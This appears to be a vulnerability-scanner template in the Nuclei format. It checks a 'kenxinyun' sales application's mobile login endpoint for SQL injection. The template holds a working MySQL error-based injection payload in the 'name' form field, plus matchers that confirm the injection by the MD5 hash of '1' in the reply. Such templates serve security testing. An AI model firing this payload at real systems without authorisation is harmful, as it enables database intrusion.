id: kenxinyun-home_check_sqli
info:
  name: kenxinyun-home_check_sqli
  author: lemonlove7
  severity: high
http:
  - raw:
      - |-
        POST /chainsales/mobile/home/check HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.3055.69 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 94
        
        name=%' AND GTID_SUBSET(CONCAT(0x7e,(SELECT (ELT(1=1,MD5(1)))),0x7e),8475) AND '1%'='1&pwd=123
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - c4ca4238a0b923820dcc509a6f75849b
    matchers-condition: and
